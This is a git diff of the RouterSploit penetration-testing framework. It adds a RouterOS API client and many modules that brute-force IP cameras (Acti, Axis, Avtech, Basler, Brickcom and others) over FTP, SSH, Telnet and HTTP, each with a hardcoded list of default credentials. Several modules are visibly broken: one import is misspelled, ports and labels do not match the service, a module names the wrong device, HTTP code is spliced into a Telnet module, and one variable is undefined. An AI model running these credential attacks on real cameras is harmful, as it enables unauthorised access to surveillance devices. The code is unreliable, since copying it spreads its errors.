self.module_help) + print_info("\n", self.module_help) def command_exec(self, *args, **kwargs): os.system(args[0]) @@ -507,13 +509,13 @@ def command_search(self, *args, **kwargs): keyword = args[0] if not keyword: - utils.print_error("Please specify search keyword. e.g. 'search cisco'") + print_error("Please specify search keyword. e.g. 'search cisco'") return for module in self.modules: if keyword in module: - module = utils.humanize_path(module) - utils.print_info( + module = humanize_path(module) + print_info( "{}\033[31m{}\033[0m{}".format(*module.partition(keyword)) ) diff --git a/routersploit/lib/__init__.py b/routersploit/lib/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/lib/apiros/__init__.py b/routersploit/lib/apiros/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/lib/apiros/apiros_client.py b/routersploit/lib/apiros/apiros_client.py new file mode 100644 index 000000000..74f020b38 --- /dev/null +++ b/routersploit/lib/apiros/apiros_client.py @@ -0,0 +1,143 @@ +import sys +import time +import binascii +import hashlib + + +class ApiRosClient(object): + "Routeros api" + def __init__(self, sk): + self.sk = sk + self.currenttag = 0 + + def login(self, username, pwd): + for repl, attrs in self.talk(["/login"]): + chal = binascii.unhexlify((attrs['=ret']).encode('UTF-8')) + md = hashlib.md5() + md.update(b'\x00') + md.update(pwd.encode('UTF-8')) + md.update(chal) + output = self.talk(["/login", "=name=" + username, + "=response=00" + binascii.hexlify(md.digest()).decode('UTF-8') ]) + return output + + def talk(self, words): + if self.writeSentence(words) == 0: return + r = [] + while 1: + i = self.readSentence(); + if len(i) == 0: continue + reply = i[0] + attrs = {} + for w in i[1:]: + j = w.find('=', 1) + if (j == -1): + attrs[w] = '' + else: + attrs[w[:j]] = w[j+1:] + r.append((reply, attrs)) + if reply == '!done': return r + + def writeSentence(self, words): + ret = 0 + for w in words: + self.writeWord(w) + ret += 1 + self.writeWord('') + return ret + + def readSentence(self): + r = [] + while 1: + w = self.readWord() + if w == '': return r + r.append(w) + + def writeWord(self, w): + self.writeLen(len(w)) + self.writeStr(w) + + def readWord(self): + ret = self.readStr(self.readLen()) + return ret + + def writeLen(self, l): + if l < 0x80: + self.writeByte((l).to_bytes(1, sys.byteorder)) + elif l < 0x4000: + l |= 0x8000 + tmp = (l >> 8) & 0xFF + self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder)) + self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder)) + elif l < 0x200000: + l |= 0xC00000 + self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder)) + self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder)) + self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder)) + elif l < 0x10000000: + l |= 0xE0000000 + self.writeByte(((l >> 24) & 0xFF).to_bytes(1, sys.byteorder)) + self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder)) + self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder)) + self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder)) + else: + self.writeByte((0xF0).to_bytes(1, sys.byteorder)) + self.writeByte(((l >> 24) & 0xFF).to_bytes(1, sys.byteorder)) + self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder)) + self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder)) + self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder)) + + def readLen(self): + c = ord(self.readStr(1)) + if (c & 0x80) == 0x00: + pass + elif (c & 0xC0) == 0x80: + c &= ~0xC0 + c <<= 8 + c += ord(self.readStr(1)) + elif (c & 0xE0) == 0xC0: + c &= ~0xE0 + c <<= 8 + c += ord(self.readStr(1)) + c <<= 8 + c += ord(self.readStr(1)) + elif (c & 0xF0) == 0xE0: + c &= ~0xF0 + c <<= 8 + c += ord(self.readStr(1)) + c <<= 8 + c += ord(self.readStr(1)) + c <<= 8 + c += ord(self.readStr(1)) + elif (c & 0xF8) == 0xF0: + c = ord(self.readStr(1)) + c <<= 8 + c += ord(self.readStr(1)) + c <<= 8 + c += ord(self.readStr(1)) + c <<= 8 + c += ord(self.readStr(1)) + return c + + def writeStr(self, str): + n = 0; + while n < len(str): + r = self.sk.send(bytes(str[n:], 'UTF-8')) + if r == 0: raise RuntimeError("connection closed by remote end") + n += r + + def writeByte(self, str): + n = 0; + while n < len(str): + r = self.sk.send(str[n:]) + if r == 0: raise RuntimeError("connection closed by remote end") + n += r + + def readStr(self, length): + ret = '' + while len(ret) < length: + s = self.sk.recv(length - len(ret)) + if s == '': raise RuntimeError("connection closed by remote end") + ret += s.decode('UTF-8', 'replace') + return ret + diff --git a/routersploit/modules/__init__.py b/routersploit/modules/__init__.py index 57838b2f6..e69de29bb 100644 --- a/routersploit/modules/__init__.py +++ b/routersploit/modules/__init__.py @@ -1 +0,0 @@ -__author__ = 'fwkz' diff --git a/routersploit/modules/creds/cameras/__init__.py b/routersploit/modules/creds/cameras/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/acti/__init__.py b/routersploit/modules/creds/cameras/acti/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/acti/ftp_default_creds.py b/routersploit/modules/creds/cameras/acti/ftp_default_creds.py new file mode 100644 index 000000000..fb94ba4b1 --- /dev/null +++ b/routersploit/modules/creds/cameras/acti/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Acti Camera Default FTP Creds", + "description": "Module performs dictionary attack with default credentials against Acti Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Acti Camera", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:12345,admin:123456,Admin:12345,Admin:123456", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/acti/telnet_default_creds.py b/routersploit/modules/creds/cameras/acti/telnet_default_creds.py new file mode 100644 index 000000000..b570be65b --- /dev/null +++ b/routersploit/modules/creds/cameras/acti/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Acti Camera Default Telnet Creds", + "description": "Module performs dictionary attack with default credentials against Acti Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Acti Camera", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:12345,admin:123456,Admin:12345,Admin:123456", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/acti/webinterface_http_form_default_creds.py b/routersploit/modules/creds/cameras/acti/webinterface_http_form_default_creds.py new file mode 100644 index 000000000..7e3fa77d2 --- /dev/null +++ b/routersploit/modules/creds/cameras/acti/webinterface_http_form_default_creds.py @@ -0,0 +1,69 @@ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): + __info__ = { + "name": "Acti Camera Default Web Interface Creds - HTTP Form", + "description": "Module performs default credentials check against Acti Camera Web Interface. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Acti Camera", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(80, "Target HTTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:12345,admin:123456,Admin:12345,Admin:123456", "User:Pass or file with default ccredentials (file://)") + stop_on_success = OptBool("false", "Stop on first valid authentication attempt") + verbosity = OptBool("true", "Display authentication attempts") + + def run(self): + self.credentials = [] + self.attack() + + @multi + def attack(self): + if not self.check(): + return + + print_status("Starting default credentials attack against Acti Camera Web Interface") + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Username", "Password") + print_table(headers, *self.credentials) + else: + print_error("Credentials not found") + + def target_function(self, data): + pass + + def check(self): + response = self.http_request( + method="GET", + path="/video.htm" + ) + + if response and ">Password<" in response.text: + return True + + return False + + @mute + def check_default(self): + if self.check(): + self.credentials = [] + + self.run_threads(self.threads, self.target_function, self.defaults) + + if self.credentials: + return self.credentials + + return None diff --git a/routersploit/modules/creds/cameras/american_dynamics/__init__.py b/routersploit/modules/creds/cameras/american_dynamics/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/american_dynamics/ftp_default_creds.py b/routersploit/modules/creds/cameras/american_dynamics/ftp_default_creds.py new file mode 100644 index 000000000..ff4788b17 --- /dev/null +++ b/routersploit/modules/creds/cameras/american_dynamics/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __name__ = { + "name": "American Dynamics Camera Default FTP Creds", + "description": "Module performs dictionary attack against American Dybnamics Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "American Dynamics Camera", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:9999", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/american_dynamics/ssh_default_creds.py b/routersploit/modules/creds/cameras/american_dynamics/ssh_default_creds.py new file mode 100644 index 000000000..4ea491764 --- /dev/null +++ b/routersploit/modules/creds/cameras/american_dynamics/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "American Dynamics Camera Default SSH Creds", + "description": "Module performs dictionary attack against American Dynamics Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "American Dynamics Camera", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,admin:9999", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/american_dynamics/telnet_default_creds.py b/routersploit/modules/creds/cameras/american_dynamics/telnet_default_creds.py new file mode 100644 index 000000000..314d5078f --- /dev/null +++ b/routersploit/modules/creds/cameras/american_dynamics/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "American Dynamics Default Telnet Creds", + "description": "Module performs dictionary attack against American Dynamics Telnet service. " + "If valid credentials are found, they are displayed to te user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Arecont Camera", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:,:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/arecont/ssh_default_creds.py b/routersploit/modules/creds/cameras/arecont/ssh_default_creds.py new file mode 100644 index 000000000..5a9199e1c --- /dev/null +++ b/routersploit/modules/creds/cameras/arecont/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Arecont Camera Default SSH Creds", + "description": "Module performs dictionary attack against Arecont Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Arecont Camera", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:,:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/arecont/telnet_default_creds.py b/routersploit/modules/creds/cameras/arecont/telnet_default_creds.py new file mode 100644 index 000000000..3f8d305c8 --- /dev/null +++ b/routersploit/modules/creds/cameras/arecont/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Arecont Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Arecont Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Arecont Camera", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:,:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/avigilon/__init__.py b/routersploit/modules/creds/cameras/avigilon/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/avigilon/ftp_default_creds.py b/routersploit/modules/creds/cameras/avigilon/ftp_default_creds.py new file mode 100644 index 000000000..a8526e580 --- /dev/null +++ b/routersploit/modules/creds/cameras/avigilon/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.expxloit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Avigilon Camera Default FTP Creds", + "description": "Module performs dictionary attack against Avigilon Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": ( + "Marcin Bury ", # routersploit module + ), + "devices": ( + "Avigilon Camera", + ), + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,Administrator:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/avigilon/ssh_default_creds.py b/routersploit/modules/creds/cameras/avigilon/ssh_default_creds.py new file mode 100644 index 000000000..6a9f0f4a0 --- /dev/null +++ b/routersploit/modules/creds/cameras/avigilon/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Avigilon Camera Default SSH Creds", + "description": "Module performs dictionary attack against Avigilon Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Avigilon Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,Administrator:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/avigilon/telnet_default_creds.py b/routersploit/modules/creds/cameras/avigilon/telnet_default_creds.py new file mode 100644 index 000000000..a366ff162 --- /dev/null +++ b/routersploit/modules/creds/cameras/avigilon/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Avigilon Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Avigilon Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Avigilon Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin,Administrator:", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/avtech/__init__.py b/routersploit/modules/creds/cameras/avtech/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/avtech/ftp_default_creds.py b/routersploit/modules/creds/cameras/avtech/ftp_default_creds.py new file mode 100644 index 000000000..e2b696a95 --- /dev/null +++ b/routersploit/modules/creds/cameras/avtech/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Avtech Camera Default FTP Creds", + "description": "Module performs dictionary attack against Avtech Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Avtech Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/avtech/ssh_default_creds.py b/routersploit/modules/creds/cameras/avtech/ssh_default_creds.py new file mode 100644 index 000000000..62a758e99 --- /dev/null +++ b/routersploit/modules/creds/cameras/avtech/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Avtech Camera Default SSH Creds", + "description": "Module performs dictionary attack against Avtech Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Avtech Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/avtech/telnet_default_creds.py b/routersploit/modules/creds/cameras/avtech/telnet_default_creds.py new file mode 100644 index 000000000..9f991d371 --- /dev/null +++ b/routersploit/modules/creds/cameras/avtech/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Avtech Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Avtech Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Avtech Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/axis/__init__.py b/routersploit/modules/creds/cameras/axis/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/axis/ftp_default_creds.py b/routersploit/modules/creds/cameras/axis/ftp_default_creds.py new file mode 100644 index 000000000..8ffc960d1 --- /dev/null +++ b/routersploit/modules/creds/cameras/axis/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Axis Camera Default FTP Creds", + "description": "Module performs dictionary attack against Axis Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Axis Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("root:pass,admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/axis/ssh_default_creds.py b/routersploit/modules/creds/cameras/axis/ssh_default_creds.py new file mode 100644 index 000000000..5acb6c068 --- /dev/null +++ b/routersploit/modules/creds/cameras/axis/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Axis Camera Default SSH Creds", + "description": "Module performs dictionary attack against Axis Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Axis Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("root:pass,admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/axis/telnet_default_creds.py b/routersploit/modules/creds/cameras/axis/telnet_default_creds.py new file mode 100644 index 000000000..34fdcc693 --- /dev/null +++ b/routersploit/modules/creds/cameras/axis/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Axis Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Axis Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Axis Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("root:pass,admin:admin", "User:Pass or file with defaults credentials (file://)") diff --git a/routersploit/modules/creds/cameras/axis/webinterface_http_auth_default_creds.py b/routersploit/modules/creds/cameras/axis/webinterface_http_auth_default_creds.py new file mode 100644 index 000000000..fe6269586 --- /dev/null +++ b/routersploit/modules/creds/cameras/axis/webinterface_http_auth_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.http_basic_digest_default import Exploit as HTTPBasicDigestDefault + + +class Exploit(HTTPBasicDigestDefault): + __info__ = { + "name": "Axis Camera Default Web Interface Creds - HTTP Auth", + "description": "Module performs dictionary attack against Axis Camera Web Interface. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Axis Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(80, "Target HTTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("root:pass,root:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/basler/__init__.py b/routersploit/modules/creds/cameras/basler/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/basler/ftp_default_creds.py b/routersploit/modules/creds/cameras/basler/ftp_default_creds.py new file mode 100644 index 000000000..fb6519e87 --- /dev/null +++ b/routersploit/modules/creds/cameras/basler/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Basler Camera Default FTP Creds", + "description": "Module performs dictionary attack against Basler Camera FTP service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Basler Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/basler/ssh_default_creds.py b/routersploit/modules/creds/cameras/basler/ssh_default_creds.py new file mode 100644 index 000000000..b7e792823 --- /dev/null +++ b/routersploit/modules/creds/cameras/basler/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Basler Camera Default SSH Creds", + "description": "Module performs dictionary attack against Basler Camera SSH service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Basler Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/basler/telnet_default_creds.py b/routersploit/modules/creds/cameras/basler/telnet_default_creds.py new file mode 100644 index 000000000..6cb6b561a --- /dev/null +++ b/routersploit/modules/creds/cameras/basler/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Basler Camera Default Telnet Creds", + "description": "Module performs dictionary attack against Basler Camera Telnet service. " + "If valid credentials are found, they are displayed to the user. ", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Basler Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(80, "Target HTTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") + + stop_on_success = OptBool("false", "Stop on first valid authentication attempt") + verbosity = OptBool("true", "Display authentication attempts") + + def run(self): + self.credentials = [] + self.attack() + + @multi + def attack(self): + if not self.check(): + return + + print_status("Starting default creds attack against web interface") + + self.run_threads(self.threads, self.target_function, data) + + if self.credentials: + print_success("Credentials found!") + headers = ("Target", "Port", "Service", "Login", "Password") + print_table(headers, *self.credentials) + else: + print_error("Credentials not found") + + def target_function(self, data): + pass + + @mute + def check(self): + return False + + @mute + def check_default(self): + return None + diff --git a/routersploit/modules/creds/cameras/brickcom/__init__.py b/routersploit/modules/creds/cameras/brickcom/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/creds/cameras/brickcom/ftp_default_creds.py b/routersploit/modules/creds/cameras/brickcom/ftp_default_creds.py new file mode 100644 index 000000000..3546e6e08 --- /dev/null +++ b/routersploit/modules/creds/cameras/brickcom/ftp_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ftp_default import Exploit as FTPDefault + + +class Exploit(FTPDefault): + __info__ = { + "name": "Brickcom Camera Default FTP Creds", + "description": "Module performs dictionary attack against Brickcom Camera FTP servie. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Brickcom Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(21, "Target FTP port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/brickcom/ssh_default_creds.py b/routersploit/modules/creds/cameras/brickcom/ssh_default_creds.py new file mode 100644 index 000000000..3d9f61178 --- /dev/null +++ b/routersploit/modules/creds/cameras/brickcom/ssh_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault + + +class Exploit(SSHDefault): + __info__ = { + "name": "Brickcom Camera Default SSH Creds", + "description": "Module performs dictionary attack against Brickcom Camera SSH service. " + "If valid credentials are found they are displayed to the user. ", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Brickcom Camera", + ] + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(22, "Target SSH port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/brickcom/telnet_default_creds.py b/routersploit/modules/creds/cameras/brickcom/telnet_default_creds.py new file mode 100644 index 000000000..f3d8a2084 --- /dev/null +++ b/routersploit/modules/creds/cameras/brickcom/telnet_default_creds.py @@ -0,0 +1,22 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.telnet_default import Exploit as TelnetDefault + + +class Exploit(TelnetDefault): + __info__ = { + "name": "Brickcom Camera Telnet Creds", + "description": "Module performs dictionary attack against Brickcom Camera Telnet service. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "brickcom Camera", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(23, "Target Telnet port") + + threads = OptInteger(1, "Number of threads") + defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") diff --git a/routersploit/modules/creds/cameras/brickcom/webinterface_http_auth_default_creds.py b/routersploit/modules/creds/cameras/brickcom/webinterface_http_auth_default_creds.py new file mode 100644 index 000000000..4f77142ea --- /dev/null +++ b/routersploit/modules/creds/cameras/brickcom/webinterface_http_auth_default_creds.py @@ -0,0 +1,23 @@ +from routersploit.core.exploit import * +from routersploit.modules.creds.generic.http_basic_digest_default import Exploit as HTTPBasicDigestDefault + + +class Exploit(HTTPBasicDigestDefault): + __info__ = { + "name": "Brickcom Camera Default Web Interface Creds - HTTP Auth", + "description": "Module performs dictionary attack against Brickcom Camera. " + "If valid credentials are found, they are displayed to the user.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "devices": [ + "Brickcom Camera", + ], + } + + target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") + port = OptPort(80, "Target HTTP port") + path = OptString("/", "Target path") + + threads = 